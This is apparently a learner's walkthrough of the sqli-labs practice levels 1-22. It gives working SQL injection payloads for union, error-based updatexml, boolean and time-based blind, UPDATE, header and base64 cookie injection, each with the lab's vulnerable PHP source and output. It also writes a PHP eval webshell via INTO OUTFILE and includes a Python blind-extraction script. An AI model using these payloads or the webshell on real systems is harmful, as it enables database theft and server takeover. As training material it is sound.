I worked through the levels in numerical order; the notes are grouped by injection type / page title.
The categories overlap, e.g. error-based injection and Double Injection.
Levels without a heading of their own are repeats of the previous type, only with a different closing sequence.
I. Error-based injection
I think this first part also belongs under Double Inject, but the lab titles these levels "error based", so I keep that.
1. GET-Single Quotes
-- Test for injection ====
-- --+ also works as the comment (the + is URL-decoded to the space MySQL requires after --)
?id=1' and 1=1 -- x
?id=1' and 1=1 -- +
?id=1' and 1=2 -- x
-- Find the number of columns ====
?id=1' order by 3 -- x
?id=1' order by 4 -- x
-- Once order by errors out, use union to display your own select results ====
?id=100' union select 1, 2, 3 -- x
-- Your Login name:2
-- Your Password:3
-- Database name ====
?id=100' union select 1, database(), 3 -- x
-- Your Login name:security
-- Table names ====
?id=100' union select 1, table_name, 3 from information_schema.tables where table_schema="security" -- x
-- Your Login name:emails
?id=100' union select 1, table_name, 3 from information_schema.tables where table_schema="security" limit 3,1 -- x
-- Your Login name:users    tables named like users deserve special attention
-- Column names ====
?id=100' union select 1, column_name, 3 from information_schema.columns where table_schema="security" and table_name="emails" -- x
-- Your Login name:id
?id=100' union select 1, column_name, 3 from information_schema.columns where table_schema="security" and table_name="emails" limit 1,1 -- x
-- Your Login name:email_id
?id=100' union select 1, group_concat(column_name), 3 from information_schema.columns where table_schema="security" and table_name="emails" -- x
-- Your Login name:id,email_id
-- Fetch data ====
?id=100' union select 1, 2, 3 from emails limit 1,1-- x
-- Your Login name:1
Now the users table:
-- columns of users
?id=100' union select 1, column_name, 3 from information_schema.columns where table_schema="security" and table_name="users" limit 1,1 -- x
-- Your Login name:username
?id=100' union select 1, column_name, 3 from information_schema.columns where table_schema="security" and table_name="users" limit 2,1 -- x
-- Your Login name:password
-- Fetch data
?id=100' union select 1, username, password from users limit 1,1 -- x
-- Your Login name:Angelina
-- Your Password:I-kill-you
The SQL statement in the source:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
Note:
group_concat can return many values at once, but if the output is length-limited the string gets truncated (the server-side group_concat_max_len defaults to 1024 bytes, and the page may cut it shorter), so it is safer to use limit and fetch one row at a time, scripted.
2. GET-Integer
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
Same as Less-1, only without a quote to close; skip.
3. GET-Single Quotes with Twist (single quote plus parenthesis)
?id=100') union select 1, 2, 3 -- x
Source:
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
4. GET-Double Quotes (double quote plus parenthesis)
?id=100") union select 1, 2, 3 -- x
Source:
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
11. POST-Single Quotes
For a POST login form like this one, start by entering the so-called universal account/password (it doubles as the injection test):
' or 1=1 -- x
-- Your Login name:Dumb
-- Your Password:Dumb
Then find the column count and pair it with a union:
' or 1=1 order by 3 -- x
' union select 1,2 -- x
From here on it is the same as Less-1 (GET):
-- Database name
' union select 1, database() -- x
-- Table names
' union select 1, table_name from information_schema.tables where table_schema='security' -- x
' union select 1, table_name from information_schema.tables where table_schema=0x7365637572697479 -- x
-- Column names
' union select 1, column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1 -- x
' union select 1, column_name from information_schema.columns where table_schema='security' and table_name=0x656d61696c73 limit 1,1 -- x
-- Fetch data
' union select id,email_id from emails limit 0,1 -- x
The SQL in the source:
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
12.
Compared with Less-11, the closing changes from a single quote to double quote plus parenthesis ("):
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
II. Double-query injection (Double Inject)
Loosely speaking, almost every payload in these notes is a Double Injection...
Double Injection, "double query injection", means a query statement that itself contains a select statement (a subquery). The classic form is the duplicate-key trick with rand(), floor() and group by; updatexml() and extractvalue() give the same effect with a shorter payload.
In SQL injection you sometimes meet this situation: when the SQL statement is valid the page returns normally but contains nothing useful, while an invalid statement makes the page print the SQL error. The error message then becomes the channel for the data.
The most common double-query vector is updatexml(): when its second argument is not a valid XPath expression, MySQL raises an error that echoes the argument. The echoed text is cut off at 32 characters, so longer values have to be fetched in pieces with substr().
5. GET-Single Quotes
Test for injection:
?id=1 and 1=1 -- x
?id=1 and 1=2 -- x
?id=1' and 1=1 -- x
?id=1' and 1=2 -- x
?id=1' -- this one errors
Next I tried to find the column count, but whatever the payload, the page never shows anything useful (order by still separates valid from invalid through the error, but union results are not displayed), so updatexml it is.
?id=1' and updatexml(1,
concat(0x7e,
(select database()),
0x7e),
1) -- x
-- on one line
?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- x
-- XPATH syntax error: '~security~'
Then just replace the select database()
with whatever query you need.
-- Table names
?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),0x7e),1) -- x
-- XPATH syntax error: '~emails~'
-- Column names
?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 1,1),0x7e),1) -- x
-- XPATH syntax error: '~email_id~'
-- Data
?id=1' and updatexml(1,concat(0x7e,(select email_id from emails limit 0,1),0x7e),1) -- x
-- XPATH syntax error: '~Dumb@dhakkan.com~'
The SQL in the source is the same as Less-1, only the query result is no longer printed:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
// ...
}
else
{
//...
print_r(mysql_error());
//...
}
6. GET-Double Quotes
Less-5 with the single quote replaced by a double quote:
?id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- x
13. POST-Single Quotes with Twist
The page title tells us the closing sequence is a single quote plus parenthesis.
Entering the universal account ') or 1=1 -- x as the username
logs in.
Then adapt the Less-5/6 payloads. Database name:
') and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- x
Source:
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//...
}
else
{
//...
print_r(mysql_error());
//...
}
14.
Less-13 with the closing changed to a double quote; the level title shown on this page is wrong:
" and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- x
Source:
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//...
}
else
{
//...
print_r(mysql_error());
//...
}
III. dump into outfile
To read sensitive files or write a webshell, the usual MySQL file features are:
- SELECT ... INTO DUMPFILE
- SELECT ... INTO OUTFILE
- LOAD_FILE()
They need the corresponding switch in the server config file (my.ini on Windows, my.cnf on Linux). The variable is read-only at runtime, so changing it takes a restart:
[mysqld]
secure_file_priv=
...
- NULL: file import/export is disabled;
- a directory path: only files directly in that directory are allowed (subdirectories do not work either, tested);
- empty: no directory restriction.
secure_file_priv is not the only gate: the MySQL account also needs the FILE privilege, INTO OUTFILE refuses to overwrite an existing file, and the file is written by the mysqld process, with its OS user's permissions, on the database server's filesystem.
Related queries from the mysql client when it is not enabled:
mysql> show global variables like '%secure%';
+--------------------------+-------+
| Variable_name | Value |
+--------------------------+-------+
| require_secure_transport | OFF |
| secure_auth | ON |
| secure_file_priv | NULL |
+--------------------------+-------+
3 rows in set, 1 warning (0.02 sec)
After enabling:
mysql> show global variables like '%secure%';
+--------------------------+-------+
| Variable_name | Value |
+--------------------------+-------+
| require_secure_transport | OFF |
| secure_auth | ON |
| secure_file_priv | |
+--------------------------+-------+
7. GET-outfile
Test for injection:
?id=1' -- x
order by and union kept reporting a syntax error; the source shows the value is closed with a quote and two parentheses:
?id=1')) -- x
That gives You are in.... Use outfile......
order by is still needed to find the column count (3 again):
?id=1')) order by 4 -- x
Now write the shell:
?id=1')) union select 1,"<?php eval($_REQUEST[111])?>",3 into outfile "C://bd.php" -- x
After the request the backdoor exists on the C: drive, but it cannot be reached through the web server from there (.. traversal does not work), so to get a usable webshell you still need the absolute path of the web root. The path is written on the database server's filesystem, so this only yields a shell when the database and the web server share a host.
IV. Blind injection
When there is no feedback at all (no error output), think blind injection.
Boolean-based blind relies on string functions (length(), substr(), ascii()).
Time-based blind relies on sleep() together with the conditional if(exp1, exp2, exp3).
Blind injection by hand is tiring; write a script, but sleep between requests so the target does not block you for flooding.
8. GET-Blind-Boolean-Single Quotes
First run the Less-1 routine: test for injection, find the column count, try a union.
Compared with Less-5, mysql_error() is gone too, so the page gives no feedback at all.
That is when blind injection comes in.
For boolean-based blind, start from the injection-test payload:
?id=1' and 1=1 -- x
If the backend is written carefully enough that the response is identical either way, fall back to time-based blind.
Use the expression after and to guess the length of the database name:
?id=1' and length(database())=8 -- x
Then recover the name one character at a time:
?id=1' and ascii(substr(lower(database()),1,1))=115 -- s
?id=1' and ascii(substr(lower(database()),2,1))=101 -- e
?id=1' and ascii(substr(lower(database()),3,1))=99 -- c
?id=1' and ascii(substr(lower(database()),4,1))=117 -- u
?id=1' and ascii(substr(lower(database()),5,1))=114 -- r
?id=1' and ascii(substr(lower(database()),6,1))=105 -- i
?id=1' and ascii(substr(lower(database()),7,1))=116 -- t
?id=1' and ascii(substr(lower(database()),8,1))=121 -- y
Then guess the table name:
?id=1' and ascii(substr(lower(
(select table_name from information_schema.tables where table_schema=database() limit 0,1)
),1,1))=101 -- x
Guess the column names:
?id=1' and ascii(substr(lower(
(select column_name from information_schema.columns where table_name='emails' limit 0,1)
),1,1))=105 -- x
Binary search is noticeably faster: testing with > instead of = takes about 7 requests per character over the printable range 32-126 (5 over just a-z), instead of up to one request per candidate value.
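The scripted version of this procedure, as an added example (not the lab's or the author's code): the oracle below answers the only question a boolean-blind page answers, whether a row rendered, and the extraction routine binary-searches the length and then each character. Assumptions: the backend is an in-memory sqlite3 stand-in for Less-8 with constructed rows, ascii() is registered by hand because sqlite lacks it, and the meta table stands in for database(), which sqlite does not have; BlindOracle, find_value and blind_extract are names chosen for this example.

```python
import sqlite3

# Constructed stand-in for the Less-8 backend: sqlite3 instead of MySQL.
# ascii() is not built into sqlite, so it is registered here; length(),
# substr() and lower() already behave like MySQL's for these payloads.
def make_lab_db():
    conn = sqlite3.connect(":memory:")
    conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    conn.execute("CREATE TABLE users(id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")])
    # sqlite has no database(); this table stands in for it
    conn.execute("CREATE TABLE meta(db_name TEXT)")
    conn.execute("INSERT INTO meta VALUES ('security')")
    return conn

class BlindOracle:
    """The only thing a boolean-blind page tells us: did a row render or not."""
    def __init__(self, conn):
        self.conn = conn
        self.requests = 0   # counted so the search strategies can be compared

    def ask(self, injected_id):
        self.requests += 1
        sql = f"SELECT * FROM users WHERE id='{injected_id}' LIMIT 0,1"
        try:
            return self.conn.execute(sql).fetchone() is not None
        except sqlite3.Error:
            return False    # Less-8 prints nothing on an SQL error

def find_value(oracle, greater_than, lo, hi):
    """Binary search for the integer v in [lo, hi] such that the page says
    true for greater_than(n) exactly when n < v. Takes ceil(log2(hi-lo+1))
    requests instead of up to hi-lo+1 with one '=' test per candidate."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.ask(greater_than(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo

def blind_extract(oracle, expr, max_len=64):
    """Recover the string that the SQL expression expr evaluates to, assuming
    printable ASCII (codes 32..126) and at most max_len characters."""
    length = find_value(oracle, lambda n: f"1' and length({expr})>{n} -- x", 0, max_len)
    result = ""
    for i in range(1, length + 1):
        code = find_value(
            oracle,
            lambda n, i=i: f"1' and ascii(substr({expr},{i},1))>{n} -- x",
            32, 126)
        result += chr(code)
    return result

if __name__ == "__main__":
    oracle = BlindOracle(make_lab_db())
    # "(select db_name from meta)" plays the role of database() in the lab
    name = blind_extract(oracle, "(select db_name from meta)")
    print(name, "in", oracle.requests, "requests")
```

Against the real lab, ask() becomes an HTTP GET with the payload in id and a check for the row markup in the response; the search logic does not change. Recovering "security" this way costs at most 63 requests (7 for the length plus 7 per character), where the one-value-per-request payloads above could need up to 95 per character.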
9. GET-TimeBased-Single Quotes
?id=1' and 1=1 -- x
?id=1' and 1=2 -- x
Both payloads return the same page, so use time-based blind.
?id=1' and if(length(database())=8, sleep(5), 1) -- x
The browser's network panel (F12) shows a 5-second response, so the database name is 8 characters long.
The rest follows the boolean-blind procedure, with each condition wrapped in if(..., sleep(5), 1).
10.
Less-9 with the single quote changed to a double quote.
15. POST-Single Quotes
The title says the closing is a single quote.
The universal account ' or 1=1 -- x
logs in.
' or 1=1 order by 3 -- x
and updatexml payloads to find the column count produce no error output, so print_r(mysql_error()) has been removed again.
So use blind injection.
' or length(database())=8 -- x
shows a successful login.
From here it is the same as Less-8:
' or ascii(substr(lower(database()),1,1))=115 -- s
16.
Compared with Less-15, the closing changes from a single quote to double quote plus parenthesis (").
V. update query
17. POST-error based
This page resets passwords: it has a username field and a new password field.
The universal account/password payloads fail in both.
The page header reads [PASSWORD RESET] Dhakkan
so Dhakkan is the username to test with (the other pages say welcome Dhakkan).
Try updatexml in the new password field.
' and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- x
' or updatexml(1,concat(0x7e,(select database()),0x7e),1) -- x
The database name comes back.
The updatexml points to watch, once more:
- The injection lands in an UPDATE statement here; try both and and or.
- Strings are safest as hex literals (quotes happen to work here).
- Do not forget limit.
- Mind what the payload does when it does not error: the -- x comments out the WHERE clause, so a payload in this field that runs without error rewrites the password of every user. updatexml() raises its error before the row is written, which is why these queries are safe to use here.
Continuing:
-- Table names
' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) -- x
-- XPATH syntax error: '~emails~'
-- Column names
' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='emails' limit 1,1),0x7e),1) -- x
-- XPATH syntax error: '~email_id~'
-- Fetch data
' or updatexml(1,concat(0x7e,(select email_id from emails limit 1,1),0x7e),1) -- x
-- XPATH syntax error: '~Angel@iloveu.com~'
But querying the users table for credentials goes wrong:
' or updatexml(1,concat(0x7e,(select username from users limit 1,1),0x7e),1) -- x
-- You can't specify target table 'users' for update in FROM clause
MySQL refuses to read, in a subquery, from the table the UPDATE is modifying.
Wrapping the select in a derived table (subquery with an alias) gets around it:
' or updatexml(0,concat(0x7e, (select username from (select username from users limit 0,1)a), 0x7e),1) -- x
-- XPATH syntax error: '~Dumb~'
Source (note that only $uname goes through check_input(); $passwd is concatenated into the UPDATE unescaped):
function check_input($value)
{
if(!empty($value))
{
// truncation (see comments)
$value = substr($value,0,15);
}
// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
// magic quotes put a backslash before single/double quotes, backslashes and NUL bytes;
// the feature was removed in PHP 5.4.0, so this returns FALSE from then on
{
$value = stripslashes($value);
}
// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);
//...
// connectivity
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
$row1 = $row['username'];
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);
if (mysql_error())
{
print_r(mysql_error());
}
else
{
//...
}
//...
}
else
{
//...
}
}
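Why a non-erroring payload in the new-password field is dangerous, as an added example (not the lab's code): the Less-17 UPDATE is run against an in-memory sqlite3 stand-in for the users table, once with $passwd pasted in as in the source and once with a bound parameter. With the ' or 1=1 -- x string the pasted version has no WHERE clause left (-- x comments it out), so every password is overwritten. The table rows are constructed, and reset_vulnerable and reset_parameterized are names chosen for this example.

```python
import sqlite3

# Constructed stand-in for the Less-17 users table (sqlite3, not MySQL).
def make_lab_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        (1, "Dumb", "Dumb"),
        (2, "Angelina", "I-kill-you"),
        (12, "Dhakkan", "aaaa"),
    ])
    return conn

def passwords(conn):
    return conn.execute("SELECT username, password FROM users ORDER BY id").fetchall()

def reset_vulnerable(conn, username, new_password):
    """The Less-17 UPDATE: $passwd goes in unescaped (only $uname went through
    check_input), so a quote in it breaks out of the SET value."""
    sql = f"UPDATE users SET password = '{new_password}' WHERE username='{username}'"
    conn.execute(sql)
    return passwords(conn)

def reset_parameterized(conn, username, new_password):
    """Bound parameters: the payload is stored as the literal new password of
    that one user and the WHERE clause stays intact."""
    conn.execute("UPDATE users SET password = ? WHERE username = ?",
                 (new_password, username))
    return passwords(conn)

def demo():
    # The login-bypass string from the notes, now in the new-password field.
    payload = "' or 1=1 -- x"
    # Pasted in, the statement becomes:
    #   UPDATE users SET password = '' or 1=1 -- x' WHERE username='Dhakkan'
    # The WHERE is commented out and every row gets password = ('' or 1=1).
    wrecked = reset_vulnerable(make_lab_db(), "Dhakkan", payload)
    intact = reset_parameterized(make_lab_db(), "Dhakkan", payload)
    return wrecked, intact

if __name__ == "__main__":
    wrecked, intact = demo()
    print("pasted:       ", wrecked)
    print("parameterized:", intact)
```

The same thing happens on the MySQL lab; the updatexml payloads above only avoid it because the error aborts the statement before any row is written. A blind or time-based payload in this field would not error and would reset every account.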
VI. Header Injection
First, the HTTP request headers involved:
- User-Agent: identifies the client browser; sites use it to decide between the desktop and mobile page;
- Referer: the address the requested URI was obtained from, roughly the previous page;
- Accept: the media types the client (or proxy) can handle, with their relative preference;
- X-Forwarded-For: the originating client IP as reported by a proxy. Like the other headers it is fully attacker-controlled unless a trusted proxy sets it.
This part needs an intercepting proxy (Burp Suite or ZAP): capture the request, modify it, forward it.
18. POST-UAgent Field
Straight to the source:
$uagent = $_SERVER['HTTP_USER_AGENT'];
$IP = $_SERVER['REMOTE_ADDR'];
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1)
{
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert);
print_r(mysql_error());
}
else
{
print_r(mysql_error());
}
}
username and password both go through the check, and the insert only runs after a successful login. But the uagent variable is neither checked nor escaped, so tamper with it first:
User-Agent: ' database()
After resending, the page does report a syntax error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'database()', '10.10.10.1', 'Dhakkan')' at line 1
Working from the insert statement, build the payload for the database name:
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('
' and updatexml(1, concat(0x7e, (select database()) ,0x7e) ,1)
,1,1
) -- value
, '$IP', $uname)";
|
|
v
' and updatexml(1,concat(0x7e,(select database()),0x7e),1),1,1) -- value
-- XPATH syntax error: '~security~'
Database name retrieved.
Continuing. As with update, try both and and or in an insert.
-- Table names
' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),0x7e),1),1,1) -- value
-- XPATH syntax error: '~emails~'
-- Column names
' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 1,1),0x7e),1),1,1) -- value
-- XPATH syntax error: '~email_id~'
-- Data
' or updatexml(1,concat(0x7e,(select email_id from emails limit 1,1),0x7e),1),1,1) -- value
-- XPATH syntax error: '~Angel@iloveu.com~'
19. POST-Referer
Compared with Less-18, the User-Agent is swapped for the Referer:
$uagent = $_SERVER['HTTP_REFERER'];
//...
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
print_r(mysql_error());
Build the payload:
"INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('
' and updatexml(1, concat(0x7e, (select database()) ,0x7e) ,1)
,1
) -- value
', '$IP')";
|
|
v
' and updatexml(1, concat(0x7e, (select database()) ,0x7e),1),1) -- value
-- XPATH syntax error: '~security~'
20. POST-Cookie
After logging in the page shows quite a lot:
YOUR USER AGENT IS : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50
YOUR IP ADDRESS IS : 10.10.10.1
DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE
YOUR COOKIE : uname = dhakkan and expires: Thu 17 Feb 2022 - 17:27:41
Your Login name:dhakkan
Your Password:aaaa
Your ID:12
There is also a button to delete the cookie.
Refreshing the page keeps showing the same information; clicking the delete button brings the form back.
So the backend identifies the user from the cookie on every request. Intercept one:
Cookie: uname=dhakkan; PHPSESSID=f287cam7hcr6kum7s39cmiem95
Source:
<?php
if (!isset($_COOKIE['uname']))
{
// not logged in yet: run the login flow
function check_input($value)
{
// ...
}
if (isset($_POST['uname']) && isset($_POST['passwd'])) {
// username and password are both filtered
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql = "SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
$cookee = $row1['username'];
if ($row1) {
// the user exists: set the cookie and redirect (reload)
setcookie('uname', $cookee, time() + 3600);
header('Location: index.php');
print_r(mysql_error());
} else {
print_r(mysql_error());
}
}
}
else {
// already logged in
if (!isset($_POST['submit']))
{
// show all the information
$cookee = $_COOKIE['uname'];
//...
echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
$sql = "SELECT * FROM users WHERE username='$cookee' LIMIT 0,1"; //!!!!!!!!!!!!!
$result = mysql_query($sql);
if (!$result) {
die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if ($row) {
//...
echo 'Your Login name:' . $row['username'];
echo 'Your Password:' . $row['password'];
echo 'Your ID:' . $row['id'];
} else {
//...
}
//...
}
else
{
// delete button clicked
echo " Your Cookie is deleted";
setcookie('uname', $row1['username'], time() - 3600);
header('Location: index.php');
}
}
?>
The key is the select that looks the user up by the username from the cookie:
$sql = "SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
Setting the cookie to a value with a quote produces an error:
Cookie: uname=dhakkan'
Build the payloads:
-- Column count
"SELECT * FROM users WHERE username='
dhakkan' order by 4 -- x
' LIMIT 0,1"
Cookie: uname=dhakkan' order by 4 -- x
-- Issue with your mysql: Unknown column '4' in 'order clause'
"SELECT * FROM users WHERE username='
dhakkan' union select 1,2,3 limit 1,1-- x
' LIMIT 0,1"
Cookie: uname=dhakkan' union select 1,2,3 limit 1,1-- x
Without the limit this union returns two rows (the dhakkan row first, then ours); limit 1,1 selects the second row so we can see where each column is displayed:
Your Login name:2
Your Password:3
Your ID:1
Continue building:
"SELECT * FROM users WHERE username='
dhakkan' union select database()
,(select table_name from information_schema.tables where table_schema='security' limit 0,1)
,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 1,1)
limit 1,1-- x
' LIMIT 0,1"
|
|
v
Cookie: uname=dhakkan' union select database(),(select table_name from information_schema.tables where table_schema='security' limit 0,1),(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 1,1) limit 1,1-- x
Response:
Your Login name:emails
Your Password:email_id
Your ID:security
Fetching data with updatexml works as well:
"SELECT * FROM users WHERE username='
dhakkan' and updatexml(1,concat(0x7e,(select email_id from emails limit 0,1),0x7e),1)-- x
' LIMIT 0,1"
|
|
v
uname=dhakkan' and updatexml(1,concat(0x7e,(select email_id from emails limit 0,1),0x7e),1)-- x
-- XPATH syntax error: '~Dumb@dhakkan.com~'
21. POST-Cookie-Base64-Single Quotes and Parenthesis
After logging in as dhakkan, the cookie turns out to be base64-encoded (note the two trailing =; encoding, not encryption):
YOUR COOKIE : uname = ZGhha2thbg==
Add a parenthesis to the Less-20 union payload and base64-encode it with ZAP's encoder tool:
dhakkan') union select 1,2,3 limit 1,1-- x
-->base64
ZGhha2thbicpIHVuaW9uIHNlbGVjdCAxLDIsMyBsaW1pdCAxLDEtLSB4
-->into the cookie
Cookie: uname=ZGhha2thbicpIHVuaW9uIHNlbGVjdCAxLDIsMyBsaW1pdCAxLDEtLSB4
The response shows the placeholders:
Your Login name:2
Your Password:3
Your ID:1
Fill the placeholders to get the database, table and column names:
dhakkan') union select database(),(select table_name from information_schema.tables where table_schema='security' limit 0,1),(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 1,1) limit 1,1-- x
-->encode and put in the cookie
Cookie: uname=
ZGhha2thbicpIHVuaW9uIHNlbGVjdCBkYXRhYmFzZSgpLChzZWxlY3QgdGFibGVfbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgIGxpbWl0IDAsMSksKHNlbGVjdCBjb2x1bW5fbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknIGFuZCB0YWJsZV9uYW1lPSdlbWFpbHMnICBsaW1pdCAxLDEpIGxpbWl0IDEsMS0tIHg=
Response:
Your Login name:emails    (table name)
Your Password:email_id    (column name)
Your ID:security    (database name)
Fetch one email address with updatexml:
dhakkan') and updatexml(1,concat(0x7e,(select email_id from emails limit 0,1),0x7e),1)-- x
-->encode and put in the cookie
Cookie: uname=ZGhha2thbicpIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGVtYWlsX2lkIGZyb20gZW1haWxzIGxpbWl0IDAsMSksMHg3ZSksMSktLSB4
-->response
XPATH syntax error: '~Dumb@dhakkan.com~'
Source:
<?php
if (!isset($_COOKIE['uname'])) {
// not logged in
function check_input($value)
{
//...
}
if (isset($_POST['uname']) && isset($_POST['passwd'])) {
// filtered
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql = "SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if ($row1) {
setcookie('uname', base64_encode($row1['username']), time() + 3600); // !!!!!!!!!!!!!!
//...
print_r(mysql_error());
//...
header('Location: index.php');
} else {
print_r(mysql_error());
// ...
}
}
} else {
// logged in
if (!isset($_POST['submit'])) {
// show the information
$cookee = $_COOKIE['uname'];
//...
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
$cookee = base64_decode($cookee); // !!!!!!!!!!!!!!
echo "<br></font>";
$sql = "SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
$result = mysql_query($sql);
if (!$result) {
die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if ($row) {
echo 'Your Login name:' . $row['username'];
echo 'Your Password:' . $row['password'];
echo 'Your ID:' . $row['id'];
} else {
//...
}
} else {
// delete the cookie
echo " Your Cookie is deleted";
setcookie('uname', base64_encode($row1['username']), time() - 3600);
header('Location: index.php');
}
}
?>
22.
Less-21 with the closing changed to a double quote.